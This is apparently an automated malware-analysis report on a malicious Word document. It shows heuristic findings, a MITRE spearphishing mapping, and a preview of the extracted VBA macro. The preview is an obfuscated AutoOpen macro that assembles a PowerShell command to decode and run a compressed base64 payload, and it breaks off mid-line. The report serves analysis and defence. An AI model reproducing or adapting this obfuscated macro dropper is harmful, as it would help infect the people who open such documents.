MALICIOUS
Risk Score: 142

Malware Insights

MITRE ATT&CK: T1566.001 Spearphishing Attachment
The sample contains VBA macros with an AutoOpen function, which is a common technique for executing malicious code upon opening the document. A critical heuristic firing indicates a Shell() call within the VBA, suggesting the execution of external commands. The extracted VBA script attempts to construct and execute a PowerShell command, likely to download and run a secondary payload. The specific PowerShell command construction is obfuscated, but the intent is clear.
Heuristics (5)

- VBA macros detected (medium, 2 related findings) [OLE_VBA_MACROS]: Document contains VBA macro code.
- Shell() call in VBA (critical) [OLE_VBA_SHELL]: Shell() call in VBA.
- AutoOpen macro (high) [OLE_VBA_AUTOOPEN]: AutoOpen macro.
- Legacy WordBasic auto-exec macro marker (medium) [OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info) [EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 71556 bytes |

SHA-256 (macros.bas): 53ed9e974865799cf356d93bc96b6d4e25fdf1a7d842fc4bcde59a2fd149367c
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "NLmQmSGElHV"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function tBhuH()
On Error Resume Next
NXnsHEQTsh = IcvRwbO + CSng(941024) + 776689 / Sin(545306 - CByte(588203) / 353589 - Round(941024)) + zqwJZzosMcb * wpVVfmk - (776689 + 545306 + 588203 - 9410240)
Set kMLaZhjclI = qWqEvOONt
zhfdL = "bYD7owershell (NEomCgGbg6wlNWhRHPkXndblew-oBJecT iOeIkyKxX1ojfx3Un4DxjTd"
iDsfJwBN = Left(Right(zhfdL, 68), 12) + Left(Right(zhfdL, 33), 12)
ZCYnzDYwab = "bY.stREaMw4TyVW7EomCgrEaderNWhRHPkXndbl"
DjDYONtPAS = Left(Right(ZCYnzDYwab, 37), 7) + Left(Right(ZCYnzDYwab, 18), 6)
qoKjNf = "bY( (New-w4TyVW7EomCgoBJecTNWhRHPkXndbl"
kMUmLX = Left(Right(qoKjNf, 37), 7) + Left(Right(qoKjNf, 18), 6)
wnTbk = "bYD7k iO.comprEsSiOngGbg6wlNWhRHPkXndbljHOAB3l7GVH.DeflATESTreaM( 4DxjTd23vH6PcKoVrFxmyemCp6a"
IEmjLfFhVH = CStr(Left(Right(wnTbk, 88), 15)) + Left(Right(wnTbk, 43), 16)
FTlGsICWV = ShrlKajX + CSng(712213) + 2908 / Sin(699909 - CByte(642161) / 125683 - Round(712213)) + bnfWadQwV * snOKmBmocsr - (2908 + 699909 + 642161 - 7122130)
Set KkSdjBWGN = UHuwazKcc
Vncphf = "bYD7[SyStEM.iO.7EomCgGbg6wlNWhRHPkXndmEmorystREamHkeIkyKxX1ojfx3Un4Dx"
cGowmDfU = Left(Right(Vncphf, 65), 11) + Left(Right(Vncphf, 32), 12)
OUIJDoGNaO = "bYD7k] [cONVeRT]::FroGbg6wlNWhRHPkXndbljHOAB3l7GVHkeImBAsE64stRINg('XVTd23vH6PcKoVrFxmyemCp6axzcR6g"
oTLbjL = CStr(Left(Right(OUIJDoGNaO, 94), 16)) + Left(Right(OUIJDoGNaO, 46), 17)
PmwRwbBqm = "bYD7kbbbiJHEH2PlH8Y7YGbg6wlNWhRHPkXndbljHOAB3l7GVHkeINhltvcmVkrkgl4ZSeTd23vH6PcKoVrFxmyemCp6axzcR6g"
BItVtGJu = CStr(Left(Right(PmwRwbBqm, 94), 16)) + Left(Right(PmwRwbBqm, 46), 17)
CZpDLwlZjCC = "bYDG3XARdiw/yVW7EomCgGbg6wlNWhjIdxYLkaWFHOAB3l7GVHkeIkyKx"
KZiNmt = Left(Right(CZpDLwlZjCC, 54), 9) + CStr(Left(Right(CZpDLwlZjCC, 27), 10))
qLBhW = uobizHYvMuJ + CSng(179040) + 155196 / Sin(692027 - CByte(241113) / 553143 - Round(179040)) + DrofAzRh * GnBzqw - (155196 + 692027 + 241113 - 1790400)
Set CvPknLpXB = aUABbZz
BzHFJBBmPk = Chr(43)
FVjQqa = "Eeb"
tsFIXYOjkzW = Left(Right(FVjQqa, 3), 1)
oGQFzS = Chr(43)
zowioK = "bYD7kPec0901OHkYurq6gGbg6wlNWhRHPkXndbljHOAB3l7GVHurq76tQprDOrXH5J4DxjTd23vH6PcKoVrFxmyemCp6a"
jTEkUcaTv = CStr(Left(Right(zowioK, 88), 15)) + Left(Right(zowioK, 43), 16)
twEUiBcoIlf = FSJMHGJSMpN + CSng(313578) + 972209 / Sin(433559 - CByte(883336) / 512607 - Round(313578)) + rQuOR * pnHTCiTWhzu - (972209 + 433559 + 883336 - 3135780)
Set RGNcL = vajZfAn
OEUbR = Chr(43)
izzjX = "9fD7kUp4lw4T"
WJjXDDYts = CStr(Left(Right(izzjX, 12), 2)) + Left(Right(izzjX, 6), 2)
IpPuTtwjzP = Chr(43)
NkuPopFjM = "bYLSKn3uTw4TyVW7EomCgrafS3ZNWhRHPkXndbl"
BQmPlvkiho = Left(Right(NkuPopFjM, 37), 7) + Left(Right(NkuPopFjM, 18), 6)
McvkzMqkE = "bYD7kU9lXYv7/2q61a9h9ofg6wlNWhRHPkXndbljHOAB3l7GVHkeIkyK61mvVLLLsCx/OrjJ8evH6PcKoVrFxmyemCp6axzcR6gGhtImn"
NJOZhSSsr = CStr(Left(Right(McvkzMqkE, 99), 17)) + CStr(Left(Right(McvkzMqkE, 49), 18))
VWnuTCEDPr = "bYD7kA2jwePX3g8BMdD6OGbg6wlNWhRHPkXndbljHOAB3l7GVHkeCD6MeYYtnD53MeYQxjTd23vH6PcKoVrFxmyemCp6axzc"
KNsaE = Left(Right(VWnuTCEDPr, 91), 16) + Left(Right(VWnuTCEDPr, 44), 16)
SjwKDXrIlr = "bY4dLH18Ac4TyVW7EomCgGbgxcqCIfcHPkXndbljHOAB3"
nUHobBp = Left(Right(SjwKDXrIlr, 43), 8) + CStr(Left(Right(SjwKDXrIlr, 21), 7))
rqCuojiz = aAHMTt + CSng(151576) + 351934 / Sin(148908 - CByte(756253) / 206471 - Round(151576)) + nKAkEpzKS * zltHcZVczir - (351934 + 148908 + 756253 - 1515760)
Set TlcqwkCSOmm = ZUNWUB
AFiWZQau = Chr(43)
OJtwnpmAwWP = "bY94oDUGzw4TyVW7EomCgvC5/DDNWhRHPkXndbl"
iKLraCUv = Left(Right(OJtwnpmAwWP, 37), 7) + Left(Right(OJtwnpmAwWP, 18), 6)
uVDbJbsM = "FPD7kg2Tl"
lNrhBfKFaE = Left(Right(uVDbJbsM, 9), 2) + CStr(Left(Right(uVDbJbsM, 4), 1))
QSUoi = Chr(43)
EDBmNNcF = "bYD7kUGPv26UMHKhz/sC6mCg6wlNWhRHPkXndbljHOAB3l7GVHkeIkyKnwgjLDxugEWAJe6DocvH6PcKoVrFxmyemCp6axzcR6gGhtImn"
WpwCuaHwFGN = CStr(Left(Right(E
... (truncated)